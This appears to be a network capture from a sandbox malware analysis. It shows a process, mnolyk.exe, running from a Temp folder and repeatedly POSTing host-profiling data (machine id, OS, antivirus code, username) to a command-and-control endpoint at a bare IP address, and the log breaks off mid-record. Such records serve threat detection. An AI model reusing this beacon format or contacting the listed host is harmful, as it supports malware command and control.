Feb 7, 2023 20:03:56.491966963 CET	819	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
665	192.168.2.6	50390	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:56.676042080 CET	819	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:56.739432096 CET	820	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
666	192.168.2.6	50391	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:56.919310093 CET	820	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:56.983447075 CET	821	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
667	192.168.2.6	50392	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:57.167562008 CET	821	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:57.233685017 CET	822	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
668	192.168.2.6	50393	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:57.421089888 CET	822	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:57.485174894 CET	823	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
669	192.168.2.6	50394	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:57.671451092 CET	823	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:57.734373093 CET	824	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.6	49787	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:09.515244007 CET	187	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:09.579471111 CET	187	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
670	192.168.2.6	50395	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:57.910151958 CET	824	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:57.974123001 CET	825	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
671	192.168.2.6	50396	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:58.143968105 CET	825	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:58.209055901 CET	826	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
672	192.168.2.6	50397	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:58.395000935 CET	826	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:58.457931995 CET	827	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
673	192.168.2.6	50398	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:58.636270046 CET	827	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:58.701895952 CET	828	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
674	192.168.2.6	50399	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:58.878195047 CET	828	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:58.941330910 CET	829	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
675	192.168.2.6	50400	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:59.133076906 CET	829	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:59.198379993 CET	830	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
676	192.168.2.6	50401	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:59.377763987 CET	830	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:59.441881895 CET	831	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
677	192.168.2.6	50402	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:59.613925934 CET	831	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:59.676512003 CET	832	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
678	192.168.2.6	50403	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:59.851321936 CET	832	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:59.915623903 CET	833	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
679	192.168.2.6	50404	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:00.112464905 CET	833	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:00.177272081 CET	834	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.6	49788	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:09.765671968 CET	188	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:09.828516006 CET	188	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
680	192.168.2.6	50405	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:00.344096899 CET	834	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:00.406989098 CET	835	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
681	192.168.2.6	50406	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:00.598596096 CET	835	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:00.665374994 CET	836	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
682	192.168.2.6	50407	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:00.848989964 CET	836	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:00.911798954 CET	837	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
683	192.168.2.6	50408	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:01.096954107 CET	838	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:01.162182093 CET	838	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
684	192.168.2.6	50409	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
